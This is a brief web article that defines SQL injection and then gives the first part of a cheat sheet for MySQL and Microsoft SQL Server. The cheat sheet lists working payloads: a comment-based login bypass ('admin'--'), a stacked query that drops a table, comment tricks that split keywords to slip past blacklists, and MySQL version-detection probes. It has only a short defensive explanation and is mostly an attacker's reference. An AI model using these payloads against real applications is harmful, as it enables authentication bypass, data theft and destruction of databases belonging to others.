What is SQL Injection, and SQL Injection Cheat Sheet 1

SQL Injection:

"An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input."

SQL Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn't properly filter out dangerous characters. This can allow an attacker to not only steal data from your database, but also modify and delete it. Certain SQL Servers such as Microsoft SQL Server contain Stored and Extended Procedures (database server functions). If an attacker can obtain access to these Procedures it may be possible to compromise the entire machine. Attackers commonly insert single qoutes into a URL's query string, or into a forms input field to test for SQL Injection. If an attacker receives an error message like the one below there is a good chance that the application is vulnerable to SQL Injection.

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'or'.
/wasc.asp, line 69

SQL Injection Cheat Sheet:
Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.

Line Comments

Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.

Line Comments Sample SQL Injection Attacks

• Username: admin'--
• SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.

Inline Comments

Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

• /*Comment Here*/ (SM)
  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable
  • SELECT/*avoid-spaces*/password/**/FROM/**/Members
    
    
• /*! MYSQL Special SQL */ (M)
  This is a special comment syntax for MySQL. It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
  
  SELECT /*!32302 1/0, */ 1 FROM tablename

Classical Inline Comment SQL Injection Attack Samples

• ID: 10; DROP TABLE members /*
  Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --
  
  
• SELECT /*!32302 1/0, */ 1 FROM tablename
  Will throw an divison by 0 error if MySQL version is higher than 3.23.02

MySQL Version Detection Sample Attacks

• ID: /*!32302 10*/
• ID: 10
  You will get the same response if MySQL version is higher than 3.23.02
  
  
• SELECT /*!32302 1/0, */ 1 FROM tablename
  Will throw an divison by 0 error if MySQL version is higher than 3.23.02